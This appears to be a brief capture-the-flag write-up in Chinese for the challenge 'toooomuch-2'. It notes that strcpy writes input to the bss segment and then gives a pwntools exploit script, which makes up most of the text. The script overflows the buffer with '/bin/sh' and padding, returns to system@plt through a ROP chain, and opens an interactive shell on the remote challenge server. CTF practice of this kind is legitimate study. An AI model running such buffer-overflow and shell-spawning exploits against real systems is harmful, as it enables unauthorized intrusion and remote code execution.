toooomuch-2

这题要getshell,还有system函数，strcpy会将输入的字符写到bss段，所以直接rop到system从而getshell(system函数的参数是'/bin/sh'的地址)

from pwn import *

#p = process('./toooomuch-2')
p = remote('hackme.inndy.tw',7702)
p.recvuntil('passcode: ')
system_plt = 0x080484c0
payload = '/bin/sh\x00' + 'a'*0x10 + 'aaaa'
payload += p32(system_plt) + p32(0x080487D9) + p32(0x08049C60)
#gdb.attach(p)
p.sendline(payload)

p.interactive()